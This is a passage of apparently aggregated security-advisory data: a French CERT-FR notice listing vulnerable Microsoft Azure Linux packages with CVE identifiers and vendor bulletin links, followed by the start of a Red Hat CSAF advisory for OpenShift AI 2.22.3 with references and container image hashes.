"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-61104",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-61104"
},
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-40085",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40085"
},
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-47912",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47912"
},
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-40092",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40092"
},
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-40105",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40105"
},
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-40096",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40096"
},
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-61107",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-61107"
},
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-40088",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40088"
},
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-58183",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-58183"
},
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-61725",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-61725"
},
{
"published_at": "2025-11-02",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-61101",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-61101"
},
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-61723",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-61723"
},
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-40102",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40102"
},
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-40095",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40095"
},
{
"published_at": "2025-11-01",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-12060",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-12060"
},
{
"published_at": "2025-11-02",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-62230",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62230"
},
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-58185",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-58185"
},
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-58188",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-58188"
}
]
}
CERTFR-2025-AVI-0966
Vulnerability from certfr_avis - Published: 2025-11-05 - Updated: 2025-11-05
De multiples vulnérabilités ont été découvertes dans les produits Microsoft. Elles permettent à un attaquant de provoquer un problème de sécurité non spécifié par l'éditeur.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
None| Vendor | Product | Description | ||
|---|---|---|---|---|
| Microsoft | N/A | cbl2 golang 1.22.7-5 | ||
| Microsoft | N/A | azl3 golang 1.23.12-1 | ||
| Microsoft | N/A | cbl2 python-tensorboard 2.11.0-3 | ||
| Microsoft | N/A | azl3 moby-engine 25.0.3-13 | ||
| Microsoft | N/A | azl3 python-tensorboard 2.16.2-6 | ||
| Microsoft | N/A | azl3 kernel 6.6.104.2-4 | ||
| Microsoft | N/A | cbl2 msft-golang 1.24.8-1 | ||
| Microsoft | N/A | azl3 gh 2.62.0-9 | ||
| Microsoft | N/A | azl3 frr 9.1.1-3 | ||
| Microsoft | N/A | azl3 xorg-x11-server-Xwayland 24.1.6-2 versions antérieures à 24.1.6-3 | ||
| Microsoft | N/A | cbl2 libcontainers-common 20210626-7 | ||
| Microsoft | N/A | cbl2 moby-engine 24.0.9-18 | ||
| Microsoft | N/A | cbl2 frr 8.5.5-3 | ||
| Microsoft | N/A | azl3 containerized-data-importer 1.57.0-16 | ||
| Microsoft | N/A | azl3 skopeo 1.14.4-6 | ||
| Microsoft | N/A | azl3 tensorflow 2.16.1-9 | ||
| Microsoft | N/A | azl3 keras 3.3.3-4 versions antérieures à 3.3.3-5 | ||
| Microsoft | N/A | cbl2 gcc 11.2.0-8 | ||
| Microsoft | N/A | cbl2 keras 2.11.0-3 | ||
| Microsoft | N/A | azl3 golang 1.25.3-1 | ||
| Microsoft | N/A | cbl2 tensorflow 2.11.1-2 | ||
| Microsoft | N/A | azl3 keras 3.3.3-4 | ||
| Microsoft | N/A | azl3 gcc 13.2.0-7 | ||
| Microsoft | N/A | cbl2 cri-o 1.22.3-16 | ||
| Microsoft | N/A | cbl2 skopeo 1.14.2-12 | ||
| Microsoft | N/A | cbl2 containerized-data-importer 1.55.0-25 | ||
| Microsoft | N/A | cbl2 golang 1.18.8-10 | ||
| Microsoft | N/A | azl3 libcontainers-common 20240213-3 |
| Title | Publication Time | Tags | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "cbl2 golang 1.22.7-5",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "azl3 golang 1.23.12-1",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "cbl2 python-tensorboard 2.11.0-3",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "azl3 moby-engine 25.0.3-13",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "azl3 python-tensorboard 2.16.2-6",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "azl3 kernel 6.6.104.2-4",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "cbl2 msft-golang 1.24.8-1",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "azl3 gh 2.62.0-9",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "azl3 frr 9.1.1-3",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "azl3 xorg-x11-server-Xwayland 24.1.6-2 versions ant\u00e9rieures \u00e0 24.1.6-3",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "cbl2 libcontainers-common 20210626-7",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "cbl2 moby-engine 24.0.9-18",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "cbl2 frr 8.5.5-3",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "azl3 containerized-data-importer 1.57.0-16",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "azl3 skopeo 1.14.4-6",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "azl3 tensorflow 2.16.1-9",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "azl3 keras 3.3.3-4 versions ant\u00e9rieures \u00e0 3.3.3-5",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "cbl2 gcc 11.2.0-8",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "cbl2 keras 2.11.0-3",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "azl3 golang 1.25.3-1",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "cbl2 tensorflow 2.11.1-2",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "azl3 keras 3.3.3-4",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "azl3 gcc 13.2.0-7",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "cbl2 cri-o 1.22.3-16",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "cbl2 skopeo 1.14.2-12",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "cbl2 containerized-data-importer 1.55.0-25",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "cbl2 golang 1.18.8-10",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "azl3 libcontainers-common 20240213-3",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
}
],
"affected_systems_content": null,
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2025-58183",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58183"
},
{
"name": "CVE-2025-40100",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40100"
},
{
"name": "CVE-2025-40103",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40103"
},
{
"name": "CVE-2025-61102",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61102"
},
{
"name": "CVE-2025-58185",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58185"
},
{
"name": "CVE-2025-40092",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40092"
},
{
"name": "CVE-2025-61106",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61106"
},
{
"name": "CVE-2025-61103",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61103"
},
{
"name": "CVE-2025-62230",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-62230"
},
{
"name": "CVE-2025-40104",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40104"
},
{
"name": "CVE-2025-40097",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40097"
},
{
"name": "CVE-2025-40106",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40106"
},
{
"name": "CVE-2025-58188",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58188"
},
{
"name": "CVE-2025-40088",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40088"
},
{
"name": "CVE-2025-40085",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40085"
},
{
"name": "CVE-2025-61724",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61724"
},
{
"name": "CVE-2025-61105",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61105"
},
{
"name": "CVE-2025-61723",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61723"
},
{
"name": "CVE-2025-40084",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40084"
},
{
"name": "CVE-2025-61725",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61725"
},
{
"name": "CVE-2025-47912",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47912"
},
{
"name": "CVE-2025-40095",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40095"
},
{
"name": "CVE-2025-58186",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58186"
},
{
"name": "CVE-2025-40105",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40105"
},
{
"name": "CVE-2025-62229",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-62229"
},
{
"name": "CVE-2025-58187",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58187"
},
{
"name": "CVE-2025-40083",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40083"
},
{
"name": "CVE-2025-62231",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-62231"
},
{
"name": "CVE-2025-40099",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40099"
},
{
"name": "CVE-2025-12060",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-12060"
},
{
"name": "CVE-2025-58189",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58189"
},
{
"name": "CVE-2025-40094",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40094"
},
{
"name": "CVE-2025-40102",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40102"
},
{
"name": "CVE-2025-12058",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-12058"
},
{
"name": "CVE-2025-61101",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61101"
},
{
"name": "CVE-2025-61107",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61107"
},
{
"name": "CVE-2025-61100",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61100"
},
{
"name": "CVE-2025-40096",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40096"
},
{
"name": "CVE-2025-61104",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61104"
},
{
"name": "CVE-2025-40087",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40087"
}
],
"initial_release_date": "2025-11-05T00:00:00",
"last_revision_date": "2025-11-05T00:00:00",
"links": [],
"reference": "CERTFR-2025-AVI-0966",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2025-11-05T00:00:00.000000"
}
],
"risks": [
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits Microsoft. Elles permettent \u00e0 un attaquant de provoquer un probl\u00e8me de s\u00e9curit\u00e9 non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits Microsoft",
"vendor_advisories": [
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-58189",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-58189"
},
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-40099",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40099"
},
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-40083",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40083"
},
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-58186",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-58186"
},
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-61724",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-61724"
},
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-61103",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-61103"
},
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-12058",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-12058"
},
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-40087",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40087"
},
{
"published_at": "2025-11-02",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-61100",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-61100"
},
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-61105",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-61105"
},
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-62229",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62229"
},
{
"published_at": "2025-11-01",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-40106",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40106"
},
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-62231",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62231"
},
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-61102",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-61102"
},
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-40097",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40097"
},
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-40100",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40100"
},
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-40084",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40084"
},
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-58187",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-58187"
},
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-40094",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40094"
},
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-61106",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-61106"
},
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-40104",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40104"
},
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-40103",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40103"
},
{
"published_at": "2025-11-02",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-61104",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-61104"
},
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-40085",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40085"
},
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-47912",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47912"
},
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-40092",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40092"
},
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-40105",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40105"
},
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-40096",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40096"
},
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-61107",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-61107"
},
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-40088",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40088"
},
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-58183",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-58183"
},
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-61725",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-61725"
},
{
"published_at": "2025-11-02",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-61101",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-61101"
},
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-61723",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-61723"
},
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-40102",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40102"
},
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-40095",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40095"
},
{
"published_at": "2025-11-01",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-12060",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-12060"
},
{
"published_at": "2025-11-02",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-62230",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62230"
},
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-58185",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-58185"
},
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-58188",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-58188"
}
]
}
RHSA-2025:22759
Vulnerability from csaf_redhat - Published: 2025-12-04 13:06 - Updated: 2025-12-04 17:10Notes
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Updated images are now available for Red Hat OpenShift AI.",
"title": "Topic"
},
{
"category": "general",
"text": "Release of RHOAI 2.22.3 provides these changes:",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2025:22759",
"url": "https://access.redhat.com/errata/RHSA-2025:22759"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-12060",
"url": "https://access.redhat.com/security/cve/CVE-2025-12060"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-47907",
"url": "https://access.redhat.com/security/cve/CVE-2025-47907"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-53643",
"url": "https://access.redhat.com/security/cve/CVE-2025-53643"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-58183",
"url": "https://access.redhat.com/security/cve/CVE-2025-58183"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-58754",
"url": "https://access.redhat.com/security/cve/CVE-2025-58754"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-62156",
"url": "https://access.redhat.com/security/cve/CVE-2025-62156"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-62727",
"url": "https://access.redhat.com/security/cve/CVE-2025-62727"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-9905",
"url": "https://access.redhat.com/security/cve/CVE-2025-9905"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "external",
"summary": "https://docs.redhat.com/en/documentation/red_hat_openshift_ai/",
"url": "https://docs.redhat.com/en/documentation/red_hat_openshift_ai/"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2025/rhsa-2025_22759.json"
}
],
"title": "Red Hat Security Advisory: RHOAI 2.22.3 - Red Hat OpenShift AI",
"tracking": {
"current_release_date": "2025-12-04T17:10:56+00:00",
"generator": {
"date": "2025-12-04T17:10:56+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.6.13"
}
},
"id": "RHSA-2025:22759",
"initial_release_date": "2025-12-04T13:06:08+00:00",
"revision_history": [
{
"date": "2025-12-04T13:06:08+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2025-12-04T13:06:21+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2025-12-04T17:10:56+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat OpenShift AI 2.22",
"product": {
"name": "Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift_ai:2.22::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat OpenShift AI"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"product_id": "registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-codeflare-operator-rhel9@sha256%3A8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764593039"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"product_id": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-dashboard-rhel9@sha256%3A7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764637896"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"product_id": "registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-data-science-pipelines-argo-argoexec-rhel9@sha256%3A86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764181290"
}
}
},
{
"category": "product_version",
